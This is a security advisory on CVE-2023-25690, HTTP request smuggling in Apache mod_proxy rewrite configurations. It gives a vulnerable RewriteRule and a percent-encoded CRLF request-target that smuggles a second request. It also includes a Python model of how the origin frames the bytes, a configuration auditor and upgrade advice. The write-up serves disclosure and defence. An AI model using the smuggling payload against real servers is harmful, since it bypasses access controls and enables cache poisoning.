A vulnerability has been identified in some mod_proxy configurations on Apache HTTP Server versions 2.4.0 through 2.4.55 that allows HTTP Request Smuggling attacks. The vulnerability, tracked as CVE-2023-25690, affects configurations in which mod_proxy is enabled together with a RewriteRule or ProxyPassMatch where a non-specific pattern matches some portion of the user-supplied request-target (URL) and the matched text is then re-inserted into the proxied request-target through variable substitution. An attacker who can reach such a proxy can bypass its access controls, make it proxy unintended URLs to existing origin servers, and poison cache data.

The following is an example of a vulnerable configuration pattern:

RewriteEngine on
RewriteRule "^/here/(.*)" "http://example.com:808/elsewhere?$1" [P]
ProxyPassReverse /here/ http://example.com:808/

In this pattern the non-specific group (.*) captures whatever follows /here/ in the user-supplied request-target, and the capture is re-inserted unchanged, via $1, into the request-target that mod_proxy sends to the origin server. Because mod_rewrite matches the pattern against the percent-decoded URL-path, anything the client could encode into that portion of the URL, including control characters, ends up in the proxied request.

Original References

The vulnerability was initially disclosed on the Apache HTTP Server project's security page. Detailed information about the vulnerability, its impact and the fixed release can be found under the "2.4.x vulnerabilities" section, in the "CVE-2023-25690" entry.

Exploit Details

Exploiting this vulnerability takes a single HTTP request whose request-target carries percent-encoded CR and LF bytes. In HTTP/1.x the request line and every header field end with CRLF (Carriage Return Line Feed), and an empty line (CRLF CRLF) marks the end of a request's headers. Since mod_rewrite matches the pattern against the percent-decoded URL-path, an encoded CRLF inside the part captured by the non-specific group becomes a raw CRLF in $1, and the vulnerable substitution copies it unchanged into the request-target that mod_proxy writes to the origin server. The origin therefore parses the forwarded bytes as two requests. The second one was never evaluated as a request by the proxy, so it is not subject to the proxy's access controls and can reach URLs on the origin that the proxy was never configured to expose.

For example, an attacker might send the following HTTP request

GET /here/%0d%0aContent-Length:%200%0d%0a%0d%0aGET%20/ HTTP/1.1\r\nHost: example.com\r\n ...

Here %0d%0a is the percent-encoded CRLF. After mod_rewrite decodes the URL-path, $1 is CRLF Content-Length: 0 CRLF CRLF GET /, and mod_proxy sends the origin a request line of the form GET /elsewhere?<those bytes> HTTP/1.1 followed by its own headers. The origin reads a first request that ends at the injected blank line, then a second request line, GET / HTTP/1.1, whose version token and headers are the ones mod_proxy appended. This is only one shape the smuggled request can take: any bytes the attacker can get into the capture can be framed this way.
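The chain described above, modelled as an added example (this is not code from the advisory or from the httpd project): it decodes the request-target the way mod_rewrite matches the URL-path, substitutes $1 into the vulnerable rule's proxied request-target, renders the bytes mod_proxy would write to the origin, and frames them as an origin's HTTP/1.x parser does. The backend host and port come from the configuration above; the client address and the X-Forwarded-For header are assumptions, and nothing is sent over the network.

```python
from urllib.parse import unquote_to_bytes

# Constructed attacker request-target from the write-up: percent-encoded
# CRLFs, a Content-Length: 0 header and the start of a second request line.
ATTACK_PATH = "/here/%0d%0aContent-Length:%200%0d%0a%0d%0aGET%20/"

# Backend named in the vulnerable RewriteRule above.
BACKEND = "example.com:808"


def captured_group(request_path: str) -> bytes:
    """Model the per-server RewriteRule "^/here/(.*)": httpd matches the
    percent-decoded URL-path, so $1 is the raw decoded bytes after /here/."""
    decoded = unquote_to_bytes(request_path)
    prefix = b"/here/"
    if not decoded.startswith(prefix):
        raise ValueError("rule does not match this path")
    return decoded[len(prefix):]


def proxied_request(request_path: str, client_ip: str = "203.0.113.5") -> bytes:
    """Model what mod_proxy writes to the origin for the vulnerable substitution
    "http://example.com:808/elsewhere?$1" [P]: the decoded capture lands in the
    query string of the proxied request-target verbatim, and the proxy appends
    its own version token and headers. The X-Forwarded-For value is assumed."""
    target = b"/elsewhere?" + captured_group(request_path)
    head = b"GET " + target + b" HTTP/1.1\r\n"
    head += b"Host: " + BACKEND.encode() + b"\r\n"
    head += b"X-Forwarded-For: " + client_ip.encode() + b"\r\n"
    return head + b"\r\n"


def request_lines_seen_by_origin(stream: bytes) -> list[bytes]:
    """Frame the byte stream the way an HTTP/1.x parser does: each request head
    ends at the first empty line, and the head's first line is its request line."""
    heads = [h for h in stream.split(b"\r\n\r\n") if h]
    return [h.split(b"\r\n", 1)[0] for h in heads]


def is_safe_request_target(target: bytes) -> bool:
    """The kind of check a hardened proxy applies before writing the request
    line: no CR, LF or other control bytes may appear in the request-target.
    This illustrates the check, it is not the upstream patch."""
    return not any(b < 0x20 or b == 0x7F for b in target)


if __name__ == "__main__":
    stream = proxied_request(ATTACK_PATH)
    print(stream.decode(errors="replace"))
    for line in request_lines_seen_by_origin(stream):
        print("origin request line:", line)
    print("safe:", is_safe_request_target(b"/elsewhere?" + captured_group(ATTACK_PATH)))
```

Running it prints the forwarded bytes and then two origin request lines, GET /elsewhere? and GET / HTTP/1.1; the first fragment has no HTTP version, so how a given origin treats it depends on its parser, while the second carries the version token and headers the proxy appended. The same request-target fails the control-character check, which is the property a fixed proxy enforces.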

Mitigation

Users of Apache HTTP Server versions 2.4.0 through 2.4.55 should update to at least version 2.4.56, which contains the fix. Where an immediate upgrade is not possible, review every RewriteRule with the [P] flag and every ProxyPassMatch in the mod_proxy configuration and remove the vulnerable shape: do not re-insert a capture from a non-specific pattern such as (.*) or ([^/]+) into the proxied request-target. Anchor the pattern and restrict the capture to the characters the backend path can legitimately contain (for example ([A-Za-z0-9_.-]+) followed by $), or use a fixed-prefix ProxyPass so that no user-controlled text is substituted at all.
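A small audit of the configuration shape the mitigation refers to, added here as an example (it is not an Apache tool): it parses RewriteRule [P] and ProxyPassMatch lines, extracts the capturing groups from each pattern, and flags any $N backreference in the substitution whose group can match a CR/LF sequence. The configuration excerpt is constructed for the demonstration, and the group extraction is a simplified scanner rather than PCRE.

```python
import re
import shlex

# Constructed httpd.conf excerpt (not a real deployment). Lines 2 and 3 have
# the vulnerable shape from the advisory; the rest are benign controls.
SAMPLE_CONFIG = r"""
RewriteEngine on
RewriteRule "^/here/(.*)" "http://example.com:808/elsewhere?$1" [P]
ProxyPassMatch "^/api/([^/]+)$" "http://backend:8080/v1?id=$1"
RewriteRule "^/img/([a-z0-9]+)\.png$" "http://img:8080/$1.png" [P,L]
RewriteRule "^/old/(.*)" "/new/$1" [R=301,L]
ProxyPass /app/ http://backend:8080/app/
""".strip()

BACKREF = re.compile(r"\$([1-9])")


def capture_groups(pattern: str) -> list[str]:
    """Return the source text of each capturing group in numbering order.
    Simplified scanner: handles escapes, character classes, nesting, and
    treats (?...) as non-capturing unless it is a named group."""
    groups, stack, in_class, i = [], [], False, 0
    while i < len(pattern):
        c = pattern[i]
        if c == "\\":
            i += 2  # skip the escaped character
            continue
        if in_class:
            in_class = c != "]"
        elif c == "[":
            in_class = True
        elif c == "(":
            named = re.match(r"\(\?P?<[A-Za-z_]", pattern[i:]) is not None
            stack.append((i, pattern.startswith("(?", i) and not named))
        elif c == ")" and stack:
            start, non_capturing = stack.pop()
            if not non_capturing:
                groups.append((start, pattern[start + 1:i]))
        i += 1
    return [src for _, src in sorted(groups)]


def group_can_carry_crlf(group_src: str) -> bool:
    """Can this sub-pattern on its own match text containing a CRLF? httpd
    compiles patterns with DOTALL by default (RegexDefaultOptions), so '.'
    matches newlines there; mirror that. Unparsable groups count as risky."""
    try:
        return re.fullmatch(group_src, "a\r\nb", re.DOTALL) is not None
    except re.error:
        return True


def audit_config(text: str) -> list[tuple[int, str, int]]:
    """Flag RewriteRule [P] and ProxyPassMatch lines whose substitution
    re-inserts a capture ($N) that can contain CR/LF.
    Returns (line number, directive, group number) tuples."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        try:
            tokens = shlex.split(line)
        except ValueError:
            continue  # unbalanced quotes: not a directive we can reason about
        if len(tokens) < 3:
            continue
        directive, pattern, substitution = tokens[0], tokens[1], tokens[2]
        if directive.lower() == "rewriterule":
            flags = tokens[3].strip("[]").split(",") if len(tokens) > 3 else []
            if not any(f.strip().lower() in ("p", "proxy") for f in flags):
                continue  # not proxied by this rule
        elif directive.lower() != "proxypassmatch":
            continue
        groups = capture_groups(pattern)
        for ref in BACKREF.findall(substitution):
            n = int(ref)
            if n <= len(groups) and group_can_carry_crlf(groups[n - 1]):
                findings.append((lineno, directive, n))
    return findings


if __name__ == "__main__":
    for lineno, directive, n in audit_config(SAMPLE_CONFIG):
        print(f"line {lineno}: {directive} re-inserts $ {n} from a capture that admits CR/LF")
```

On the sample it reports line 2 (the advisory's RewriteRule) and line 3: ([^/]+) is flagged as well, because a negated class admits CR and LF just as (.*) does. The ([a-z0-9]+) rule on line 4 passes, and the non-proxying redirect on line 5 is skipped. Run it against your own httpd.conf with the file's text in place of SAMPLE_CONFIG; treat any finding as the vulnerable shape until the rule is rewritten.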

The latest version of Apache HTTP Server can be downloaded from the official website.

Conclusion

CVE-2023-25690 is a critical vulnerability affecting some mod_proxy configurations on Apache HTTP Server versions 2.4.0 through 2.4.55. It allows HTTP Request Smuggling attacks that can bypass the proxy's access controls, reach unintended URLs on origin servers, and poison caches. Users should update to at least version 2.4.56 and, in the meantime, remove any RewriteRule or ProxyPassMatch that re-inserts a non-specific capture into the proxied request-target.

Timeline

Published on: 03/07/2023 16:15:00 UTC
Last modified on: 03/14/2023 15:41:00 UTC